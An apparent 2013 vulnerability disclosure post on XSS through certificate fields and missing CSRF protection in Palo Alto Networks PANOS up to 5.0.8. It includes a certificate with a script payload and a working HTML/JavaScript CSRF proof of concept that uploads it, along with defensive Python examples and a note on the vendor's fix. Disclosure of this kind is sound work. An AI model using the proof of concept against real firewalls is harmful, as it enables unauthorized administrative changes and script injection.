Friday, November 22, 2013

Palo Alto Networks PANOS <= 5.0.8 XSS

A couple of bugs exist in Palo Alto Networks PANOS <= 5.0.8 which can be exploited to conduct cross-site scripting attacks.
  • Certificate fields are displayed in the firewall web interface without proper sanitization applied to them. This way it is possible to inject HTML into the web interface.
  • Various file upload forms used by the firewall do not implement proper CSRF protection, import.certificate.php for example.


Example of a certificate containing HTML that will be rendered by the web interface:

Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number:
            e5:67:53:d1:e4:2a:71:ec
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=XX, ST=<style onload="javascript:alert(1)" />, L=Default City, O=Default Company Ltd
        Validity
            Not Before: Oct  1 16:28:18 2013 GMT
            Not After : Oct  1 16:28:18 2014 GMT
        Subject: C=XX, ST=<style onload="javascript:alert(1)" />, L=Default City, O=Default Company Ltd
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:b1:d1:b4:9a:58:5e:20:99:15:03:f0:38:e5:dd:
                    11:f1:f1:14:26:3b:aa:6e:6b:c1:c1:28:01:be:d3:
                    93:e8:b5:fb:2e:a8:89:b2:87:56:93:54:60:a6:0c:
                    40:85:31:f8:9d:fd:00:0e:2f:f1:58:e6:a5:8a:0a:
                    67:57:70:06:13:02:2e:68:44:8b:a1:23:b1:bd:27:
                    d4:88:9d:f1:44:76:65:bb:e4:70:b5:fe:9c:21:57:
                    6a:11:df:56:b5:5d:c7:18:b9:b1:9a:81:c9:ae:80:
                    16:9d:11:76:e1:6f:a8:94:dd:01:02:c7:87:7e:cc:
                    b0:06:69:d5:84:79:64:45:d3
                Exponent: 65537 (0x10001)
    Signature Algorithm: sha1WithRSAEncryption
        03:12:b6:12:74:67:8f:ac:e0:5f:02:31:b3:63:10:78:33:9d:
        5e:c0:14:d9:d9:f6:ab:17:45:d3:fa:37:b8:c6:15:7c:24:a4:
        83:61:c6:8c:92:1d:2b:2b:0d:f9:84:79:e7:db:26:07:63:e4:
        9b:3a:3c:5f:a4:31:99:4e:79:30:95:a3:ce:86:9c:09:fa:e0:
        3d:7b:c1:c4:ec:7a:79:b3:9c:7f:e2:36:3e:f2:40:cf:c0:57:
        b0:4c:99:18:76:14:23:30:da:b3:90:2d:cd:af:65:80:bc:db:
        db:3f:9e:44:a1:2e:5e:e2:29:83:ff:29:ec:17:df:8f:7b:55:
        5d:ed
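The fix on the rendering side is to treat every certificate field as untrusted text. The following Python snippet is an added example, not part of the original post: it parses the openssl-style Issuer line printed above into its RDN components, flags any value containing HTML metacharacters, and shows the escaped form the UI should emit. The table layout and the `render_row` helper are assumptions for illustration.

```python
import html
import re

# Issuer line exactly as printed for the rogue certificate above.
ISSUER_LINE = ('Issuer: C=XX, ST=<style onload="javascript:alert(1)" />, '
               'L=Default City, O=Default Company Ltd')

# Any character that could open a tag, attribute or entity once dropped into HTML.
MARKUP_RE = re.compile("[<>&\"']")


def parse_dn(line):
    """Split an openssl-style 'Issuer:'/'Subject:' line into its label and a
    list of (attribute, value) pairs. openssl separates RDNs with ', ' in this
    text output, so a plain split is sufficient for the format shown above."""
    label, _, dn = line.strip().partition(":")
    pairs = []
    for rdn in dn.strip().split(", "):
        attr, _, value = rdn.partition("=")
        pairs.append((attr.strip(), value))
    return label, pairs


def suspicious_fields(pairs):
    """Names of DN attributes whose value contains HTML metacharacters."""
    return [attr for attr, value in pairs if MARKUP_RE.search(value)]


def render_row(attr, value):
    """Build one table row the way a fixed UI should: every certificate field
    goes through html.escape before it is concatenated into markup (hypothetical layout)."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (html.escape(attr, quote=True),
                                                html.escape(value, quote=True))


def render_dn(line):
    """Return (escaped_html, flagged_attrs) for one Issuer/Subject line."""
    label, pairs = parse_dn(line)
    rows = "".join(render_row(a, v) for a, v in pairs)
    return "<table>%s</table>" % rows, suspicious_fields(pairs)


if __name__ == "__main__":
    table_html, flagged = render_dn(ISSUER_LINE)
    print("flagged attributes:", flagged)
    print(table_html)
```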


Example HTML source code to CSRF-POST this rogue certificate:

  PA: <input type="text" id="url" value="https://10.10.10.22">
  <input type=button onclick="upload()" value="Upload Certificate"/>
  <hr>
  <textarea rows=80 cols=80 id=text>
  -----------------------------
  Content-Disposition: form-data; name="ext-comp-2304"
  on
  -----------------------------
  Content-Disposition: form-data; name="certFile"; filename="server.crt"
  Content-Type: application/octet-stream
  -----BEGIN CERTIFICATE-----
  MIICXTCCAcYCCQDlZ1PR5Cpx7DANBgkqhkiG9w0BAQUFADBzMQswCQYDVQQGEwJY
  WDEvMC0GA1UECAwmPHN0eWxlIG9ubG9hZD0iamF2YXNjcmlwdDphbGVydCgxKSIg
  Lz4xFTATBgNVBAcMDERlZmF1bHQgQ2l0eTEcMBoGA1UECgwTRGVmYXVsdCBDb21w
  YW55IEx0ZDAeFw0xMzEwMDExNjI4MThaFw0xNDEwMDExNjI4MThaMHMxCzAJBgNV
  BAYTAlhYMS8wLQYDVQQIDCY8c3R5bGUgb25sb2FkPSJqYXZhc2NyaXB0OmFsZXJ0
  KDEpIiAvPjEVMBMGA1UEBwwMRGVmYXVsdCBDaXR5MRwwGgYDVQQKDBNEZWZhdWx0
  IENvbXBhbnkgTHRkMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCx0bSaWF4g
  mRUD8Djl3RHx8RQmO6pua8HBKAG+05PotfsuqImyh1aTVGCmDECFMfid/QAOL/FY
  5qWKCmdXcAYTAi5oRIuhI7G9J9SInfFEdmW75HC1/pwhV2oR31a1XccYubGagcmu
  gBadEXbhb6iU3QECx4d+zLAGadWEeWRF0wIDAQABMA0GCSqGSIb3DQEBBQUAA4GB
  AAMSthJ0Z4+s4F8CMbNjEHgznV7AFNnZ9qsXRdP6N7jGFXwkpINhxoySHSsrDfmE
  eefbJgdj5Js6PF+kMZlOeTCVo86GnAn64D17wcTsenmznH/iNj7yQM/AV7BMmRh2
  FCMw2rOQLc2vZYC829s/nkShLl7iKYP/KewX3497VV3t
  -----END CERTIFICATE-----
  -----------------------------
  Content-Disposition: form-data; name="ext-comp-2306"
  Base64 Encoded Certificate (PEM)
  -----------------------------
  Content-Disposition: form-data; name="keyFile"; filename=""
  Content-Type: application/octet-stream
  -----------------------------
  Content-Disposition: form-data; name="bImportCertificateSubmit"
  OK
  -----------------------------
  Content-Disposition: form-data; name="certFileC"
  server.crt
  -----------------------------
  Content-Disposition: form-data; name="vsysC"
  shared
  -----------------------------
  Content-Disposition: form-data; name="passPhrase"
  -----------------------------
  Content-Disposition: form-data; name="keyFileC"
  -----------------------------
  Content-Disposition: form-data; name="certName"
  TPOLLET
  -----------------------------
  Content-Disposition: form-data; name="format"
  pem
  -----------------------------
  Content-Disposition: form-data; name="includekey"
  -----------------------------
  Content-Disposition: form-data; name="certType"
  device
  -----------------------------
  Content-Disposition: form-data; name="template"
  -------------------------------
  </textarea>
  <script>
  function upload() {
    // Raw multipart body from the textarea, target host from the text field
    var text = document.getElementById('text').value;
    var host = document.getElementById('url').value;
    var url  = host + "/php/device/import.certificate.php";
    var xhr  = new XMLHttpRequest();
    xhr.withCredentials = true;
    xhr.open("POST", url, true);
    xhr.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------");
    xhr.send(text);
    alert('check ' + host + '/#device::vsys1::device/certificate-management/certificates' );
  }
  </script>
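The request above succeeds only because the upload handler accepts any multipart body that arrives with the victim's session cookie. The following Python snippet is an added example, not code from the original post or from Palo Alto Networks: it parses a multipart body with the PoC's boundary and field names, then applies the two checks a fixed handler needs, a same-origin check and a per-session form token. The `csrf_token` field name, the firewall origin and the `check_import_request` function are assumptions for illustration.

```python
import hmac
import re

BOUNDARY = "---------------------------"              # boundary used by the PoC above
CSRF_FIELD = "csrf_token"                              # assumed name of the per-session token field
FIREWALL_ORIGIN = "https://firewall.example.invalid"   # placeholder for the management URL


def build_body(fields):
    """Assemble a multipart/form-data body in the PoC's layout (constructed test input)."""
    lines = []
    for name, value in fields:
        lines += ["--" + BOUNDARY,
                  'Content-Disposition: form-data; name="%s"' % name, "", value]
    lines.append("--" + BOUNDARY + "--")
    return "\r\n".join(lines) + "\r\n"


def parse_form(body):
    """Minimal multipart parser: returns {field name: value} for each part."""
    fields = {}
    for chunk in body.split("--" + BOUNDARY):
        if not chunk.startswith("\r\n"):          # preamble or the closing '--' marker
            continue
        headers, _, value = chunk[2:].partition("\r\n\r\n")
        match = re.search(r'(?<![a-z])name="([^"]*)"', headers)   # skip filename="..."
        if match:
            # the CRLF before the next boundary belongs to the boundary, not the value
            fields[match.group(1)] = value[:-2] if value.endswith("\r\n") else value
    return fields


def check_import_request(headers, body, session_token):
    """Decide whether a POST to import.certificate.php may be processed.
    Returns (accepted, reason). The form token is the primary control; the
    Origin/Referer check is defence in depth against a forged cross-site POST."""
    origin = headers.get("Origin") or headers.get("Referer", "")
    if origin != FIREWALL_ORIGIN and not origin.startswith(FIREWALL_ORIGIN + "/"):
        return False, "cross-site origin"
    token = parse_form(body).get(CSRF_FIELD, "")
    if not hmac.compare_digest(token, session_token):
        return False, "missing or wrong CSRF token"
    return True, "ok"
```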

These issues were fixed in PANOS 5.0.9 and are mentioned in the release notes as follows:

57343—Fixed an issue that caused improper handling of imported certificates that contained HTML. 
